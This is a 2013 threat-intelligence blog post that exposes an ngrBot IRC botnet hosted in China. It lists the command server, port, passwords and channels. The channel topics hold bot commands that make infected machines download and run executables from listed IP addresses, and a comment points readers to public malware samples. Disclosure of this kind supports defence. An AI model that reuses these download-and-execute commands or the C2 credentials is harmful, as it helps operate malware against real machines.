m.jamtes.com (ngrbot irc botnet hosted by China Hefei Chinanet Anhui Province Network)

By I_Post_Ur_Info, April 21, 2013

Resolved m.jamtes.com to 60.172.228.177

Server: m.jamtes.com
Port: 7384
Server password: smart
Channel: #spd
Channel password: smart

Channel topic #spd: !mod pdef on !mdns hxxp://146.185.246.240/avxd.gif !dl hxxp://146.185.246.190/msx6971.exe !dl hxxp://146.185.246.104/dqs.exe !s -o !j #1,#2 !dl hxxps://hotfile.com/dl/203712010/822c38b/skybe.exe

Channel topic #1: !dl hxxp://146.185.246.116/mailsw7.exe !dl hxxp://146.185.246.116/lmqw7.exe !dl hxxp://146.185.246.116/five192w7.exe !dl hxxp://146.185.246.116/five172w7.exe

Channel topic #2: !dl hxxp://146.185.246.116/tefw7.exe !dl hxxp://146.185.246.116/p98w7.exe !dl hxxp://146.185.246.116/p18w7.exe !dl hxxp://146.185.246.116/p130w7.exe !dl hxxp://146.185.246.116/mixw7.exe

Channel topic #XP: !dl hxxp://146.185.246.190/msx6971.exe

Alternate domains:
m.foultouch.com
m.artiho.com

The irc server used is modified which may prevent normal clients from connecting.

Hosting infos: http://whois.domaintools.com/60.172.228.177

Categories: Uncategorized

Tags: ngrBot

Previous postbeta.uandmearevideos1.com (Betabot http botnet hosted by cheaphosts.ru)

Next postppppppp.rsmatcher.com (YABOT irc botnet hosted by China Shantou Shantou Tianyin Technology Co. Ltd)

2 Comments

Anonymous - April 21, 2013 at 10:06 pm

Any sample files or spreaders? Links are dead.

I_Post_Ur_Info - April 22, 2013 at 7:18 pm

Search for any of the filenames on https://malwr.com/analysis/search/
I've uploaded all of them as publicly available samples.

dd.sult4n.net(ngrBot hosted in United States Chicago Steadfast Networks)

178.86.23.225(ngrBot hosted in Ukraine Odessa Tehnologii Budushego Llc)

t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

2 Comments

Anonymous - April 21, 2013 at 10:06 pm

I_Post_Ur_Info - April 22, 2013 at 7:18 pm

Comments are closed